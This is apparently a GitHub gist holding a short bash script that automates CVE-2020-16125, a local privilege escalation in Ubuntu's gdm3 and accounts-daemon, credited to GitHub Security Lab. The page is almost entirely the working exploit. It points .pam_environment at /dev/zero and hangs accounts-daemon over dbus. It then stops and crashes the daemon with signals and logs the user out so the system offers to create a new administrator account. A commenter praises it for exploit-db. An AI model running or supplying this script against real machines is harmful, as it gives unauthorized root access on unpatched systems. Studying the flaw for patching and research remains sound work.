Skip to content

Instantly share code, notes, and snippets.

@mcorybillington
Last active June 14, 2021 14:17
Show Gist options
  • Save mcorybillington/5f8c531555b80fdaec025111e8f1e940 to your computer and use it in GitHub Desktop.
Save mcorybillington/5f8c531555b80fdaec025111e8f1e940 to your computer and use it in GitHub Desktop.
Quick script to automate CVE-2020-16125 Gnome gdm3 privilege escalation. Credit for discovery to Kevin Backhouse and GitHub Security Lab. Original writeup: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
#!/bin/bash
# Credit to Kevin Backhouse and GitHub Security Lab, I just scripted this...
# Original writeup: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
# CVE-2020-16125
echo "[+] Creating symlink"
ln -s /dev/zero .pam_environment;
echo "[+] Changing region"
(dbus-send --print-reply --system --dest=org.freedesktop.Accounts /org/freedesktop/Accounts/User$UID org.freedesktop.Accounts.User.SetFormatsLocale string:'en_GB.UTF-8')&
echo "[+] Removing symlink"
rm .pam_environment
ACCOUNTS_DAEMON_PID=`pidof accounts-daemon`
echo "[+] Killing accounts-daemon PID: $ACCOUNTS_DAEMON_PID"
kill -SIGSTOP $ACCOUNTS_DAEMON_PID
(nohup bash -c "sleep 3s; kill -SIGSEGV $ACCOUNTS_DAEMON_PID; kill -SIGCONT $ACCOUNTS_DAEMON_PID")&
echo "[+] Logging out so you can become root"
sleep 1
gnome-session-quit --logout --no-prompt
@deathflash1411
Copy link

Why don't you submit this to exploit-db, it's a pretty good script 👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment